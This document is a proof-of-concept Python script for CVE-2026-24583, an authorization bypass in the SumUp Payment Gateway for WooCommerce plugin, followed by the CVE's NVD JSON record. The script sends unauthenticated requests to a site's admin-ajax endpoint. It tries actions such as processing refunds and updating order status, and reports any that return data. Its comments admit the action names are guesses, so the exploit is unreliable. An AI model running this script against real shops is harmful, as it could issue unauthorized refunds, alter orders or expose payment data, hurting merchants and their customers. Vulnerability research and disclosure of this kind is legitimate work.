CVE-2026-24583

# CVE-2026-24583 PoC - SumUp Payment Gateway For WooCommerce Authorization Bypass # Affected Plugin: sumup-payment-gateway-for-woocommerce <= 2.7.9 # Vulnerability: Missing Authorization import requests import sys target = "http://target-wordpress-site.com" # Common AJAX actions that may be vulnerable ajax_actions = [ "sumup_get_transaction_details", "sumup_process_refund", "sumup_update_order_status", "sumup_get_payment_settings", "sumup_webhook_handler" ] def test_authorization_bypass(): print(f"[*] Testing CVE-2026-24583 on {target}") print("[*] Target: SumUp Payment Gateway For WooCommerce <= 2.7.9") print("[*] Vulnerability: Missing Authorization (Broken Access Control)") for action in ajax_actions: url = f"{target}/wp-admin/admin-ajax.php" data = { "action": action, "order_id": "1" # Test with a sample order ID } try: # Send unauthenticated request response = requests.post(url, data=data, timeout=10) # Check if request was processed without authentication if response.status_code == 200: # Check response for sensitive data or successful execution if "success" in response.text or "data" in response.text: if len(response.text) > 50: # Likely returned data print(f"[+] VULNERABLE: {action} - Unauthorized access possible") print(f" Response preview: {response.text[:200]}...") else: print(f"[*] POTENTIAL: {action} - Requires further testing") else: print(f"[-] SAFE: {action} - Proper authorization in place") else: print(f"[-] ERROR: {action} - HTTP {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] ERROR: {action} - {str(e)}") if __name__ == "__main__": test_authorization_bypass()

{"cve": {"id": "CVE-2026-24583", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:16.200", "lastModified": "2026-04-28T15:16:16.843", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in sumup SumUp Payment Gateway For WooCommerce sumup-payment-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SumUp Payment Gateway For WooCommerce: from n/a through <= 2.7.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en sumup SumUp Payment Gateway para WooCommerce sumup-payment-gateway-for-woocommerce permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a SumUp Payment Gateway para WooCommerce: desde n/a hasta &lt;= 2.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sumup-payment-gateway-for-woocommerce/vulnerability/wordpress-sumup-payment-gateway-for-woocommerce-plugin-2-7-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}